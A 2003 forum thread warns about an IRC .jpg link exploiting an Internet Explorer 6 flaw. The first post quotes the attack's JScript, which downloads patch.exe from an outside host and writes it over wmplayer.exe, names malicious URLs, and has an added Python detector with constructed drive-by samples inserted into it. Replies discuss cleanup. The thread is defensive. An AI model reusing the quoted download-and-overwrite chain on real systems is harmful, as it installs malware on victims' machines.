
.JPG Ie 6/Media Player virus

  • 26-10-2003 1:37pm
    #1
    Registered Users, Registered Users 2 Posts: 849 ✭✭✭


    there seems to be a url floating around IRC

    DO NOT CLICK ON IT

    http://www.angelfire.xxx/celeb2/picsx/britney.jpg

    it is using an exploit that swaps the Windows Media Player with a message from Mindlock by making use of the Internet Explorer 6 XML bypass flaw

    Related advisory:
    http://packetstormsecurity.nl/0310-advisories/IE6XMLbypass.txt

    Working example:
    http://packetstormsecurity.nl/0310-exploits/wmpphp.txt

    The guy who wrote this encoded the top 9 lines of the file to make it look like a normal(ish) page; the encoded lines match the above example. Code:

    [PHP]
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://scavenger.sharewith.us(dontclick)/patch.exe",0);
    x.Send();
    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3; s.Type = 1;
    s.Open();
    s.Write(x.responseBody);
    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";
    [/PHP]

    It downloads a file from http://scavenger.sharewith.us(dontclick)/patch.exe (This site has been suspended.)
    Someone pointed out that the virus is written in Delphi.

    Quick fix is to remove C:\Program Files\Windows Media Player\wmplayer.exe and do all the normal stuff like removing it from msconfig.

    Some people have reported that after infection (on reboot) it removes system files and a format & reinstall or a repair has to be done.

    Watch out for .jpg links on IRC; I'd say it will pop back up soon enough when they find a new host.
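The exploit chain quoted in the post is a recognisable static pattern: an XMLHTTP fetch, an ADODB.Stream write to a fixed path, and a protocol handler (mms://) that launches the overwritten program. The script below is an added example written for this thread, not code from the post or the advisory; it scans saved page source for that chain, unwrapping unescape("...") encoding first because the post notes the original page had its payload lines encoded. All sample scripts in it are constructed, with a placeholder host (example.invalid) and a placeholder target path, and the indicator names are labels chosen here.

```python
import re

# Indicators of the download-and-overwrite chain quoted in the post above:
# XMLHTTP fetches a binary, ADODB.Stream writes it to disk, a protocol handler
# (mms://) launches the overwritten program. Names are descriptive labels only.
INDICATORS = {
    "xmlhttp_fetch": re.compile(r'ActiveXObject\(\s*["\']Microsoft\.XMLHTTP["\']', re.I),
    "adodb_stream": re.compile(r'ActiveXObject\(\s*["\']ADODB\.Stream["\']', re.I),
    "save_to_file": re.compile(r'\.SaveToFile\s*\(', re.I),
    "mms_handler": re.compile(r'["\']mms:', re.I),
}

# unescape("...") literal: the body may only contain %XX / %uXXXX sequences or
# non-quote characters, so a quoted payload cannot end the match early.
UNESCAPE_CALL = re.compile(
    r'unescape\(\s*(["\'])((?:%[0-9A-Fa-f]{2}|%[uU][0-9A-Fa-f]{4}|[^"\'])*)\1\s*\)', re.I
)
PCT_SEQ = re.compile(r'%[uU][0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2}')
SAVE_PATH = re.compile(r'SaveToFile\s*\(\s*["\']([^"\']+)["\']', re.I)


def js_unescape(s):
    """Decode JScript unescape() sequences (%XX and %uXXXX) in s."""
    def repl(m):
        tok = m.group(0)
        return chr(int(tok[2:], 16)) if tok[1] in "uU" else chr(int(tok[1:], 16))
    return PCT_SEQ.sub(repl, s)


def deobfuscate(script, max_rounds=3):
    """Inline unescape("...") literals so hidden indicators become visible.

    Runs a few rounds to unwrap nested encodings and stops when nothing changes.
    """
    text = script
    for _ in range(max_rounds):
        new = UNESCAPE_CALL.sub(lambda m: js_unescape(m.group(2)), text)
        if new == text:
            break
        text = new
    return text


def scan_script(script):
    """Report which indicators a script contains and whether the full chain is present.

    drive_by is True only for the combination fetch + ADODB.Stream + SaveToFile;
    XMLHTTP on its own is ordinary page behaviour and is not flagged.
    """
    text = deobfuscate(script)
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    # JS source escapes backslashes, so "C:\\dir" in the script is C:\dir on disk.
    paths = [p.replace("\\\\", "\\") for p in SAVE_PATH.findall(text)]
    return {
        "hits": hits,
        "drive_by": hits["xmlhttp_fetch"] and hits["adodb_stream"] and hits["save_to_file"],
        "paths": paths,
        "obfuscated": text != script,
    }


# Constructed samples (not from the thread). BENIGN uses XMLHTTP the ordinary way;
# DRIVE_BY mirrors the quoted chain with a placeholder host and target path;
# OBFUSCATED hides DRIVE_BY behind unescape(), as the post says the real page did.
BENIGN = (
    'var x = new ActiveXObject("Microsoft.XMLHTTP");\n'
    'x.open("GET", "/status.xml", false);\n'
    'x.send();\n'
    'document.getElementById("out").innerText = x.responseText;\n'
)
DRIVE_BY = (
    'var x = new ActiveXObject("Microsoft.XMLHTTP");\n'
    'x.Open("GET", "http://example.invalid/patch.exe", 0);\n'
    'x.Send();\n'
    'var s = new ActiveXObject("ADODB.Stream");\n'
    's.Mode = 3; s.Type = 1;\n'
    's.Open();\n'
    's.Write(x.responseBody);\n'
    's.SaveToFile("C:\\\\Example\\\\target.exe", 2);\n'
    'location.href = "mms://";\n'
)
OBFUSCATED = 'document.write(unescape("' + "".join("%%%02X" % ord(c) for c in DRIVE_BY) + '"));'


def main():
    for label, sample in (("benign", BENIGN), ("plain", DRIVE_BY), ("obfuscated", OBFUSCATED)):
        r = scan_script(sample)
        flag = "FLAG" if r["drive_by"] else "ok  "
        print(f"{flag} {label:10s} obfuscated={r['obfuscated']} paths={r['paths']}")


if __name__ == "__main__":
    main()
```

Run it as a script to see the three verdicts, or call scan_script() on the text of a saved page. It is a string-level check: it catches percent-encoded payloads like the one described in the post, but not every encoding a page author might use, so treat a clean result as "nothing found", not as proof the page is safe, and treat a flagged result as a reason to look at the SaveToFile target and the fetched URL.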


Comments

  • Registered Users, Registered Users 2 Posts: 3,216 ✭✭✭phreak


    I have the virus and now I can't even start Windows... anyone know a way to fix it without a format?


  • Registered Users, Registered Users 2 Posts: 849 ✭✭✭Cr8or


    run a repair ?


  • Registered Users, Registered Users 2 Posts: 12,309 ✭✭✭✭Bard


    I may have gotten it, and as it only seems to affect wmplayer.exe, I've done the following :-

    1. Deleted the Windows Media Player executable
    C:\Program Files\Windows Media Player\wmplayer.exe

    2. Run the Windows Media Player Setup Wizard
    C:\Program Files\Windows Media Player\setup_wm.exe

    (This downloads any Windows Media Player components you don't have and reinstalls the application)

    Hope it's that simple.


  • Registered Users, Registered Users 2 Posts: 849 ✭✭✭Cr8or


    check your msconfig & services too


  • Registered Users, Registered Users 2 Posts: 12,309 ✭✭✭✭Bard


    Originally posted by Cr8or
    check your msconfig & services too

    Can you be more specific? What are we looking for in Services in MSCONFIG?


  • Registered Users, Registered Users 2 Posts: 849 ✭✭✭Cr8or


    Anything that shouldn't be there... I haven't been infected so I dunno how it boots with the system... look for suspicious names, I'd say... for services, tick the "don't display Microsoft services" check box in msconfig; this should shorten the list a bit.


  • Registered Users, Registered Users 2 Posts: 12,309 ✭✭✭✭Bard


    I disabled one startup item, the only one with %systemroot% in
    the command line...

    "%systemroot%\system32\dumprep 0 -k"


    Didn't remember having seen it before...


  • Closed Accounts Posts: 3,299 ✭✭✭oeNeo


    Is there a way to find out for sure if you have this? I'm just after clicking some .jpg in irc and it opened WMP in the browser. Just now I've discovered IXPLORE.exe in msconfig and ZA is asking me whether I want it to access the interweb. I said no obviously so maybe it hasn't downloaded the actual virus yet?

    I've deleted the WMP.exe and am in the process of running a virus scan.


  • Registered Users, Registered Users 2 Posts: 849 ✭✭✭Cr8or


    There are a few going around; remove IXPLORE.exe (probably some sort of backdoor).

    Also send it in to Symantec & your AV company (it's always nice to help).


  • Closed Accounts Posts: 3,299 ✭✭✭oeNeo


    The one I clicked was won.attaq.net with lol.jpg at the end.

    http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=100749

    Vielen Dank to cr8or for his help.

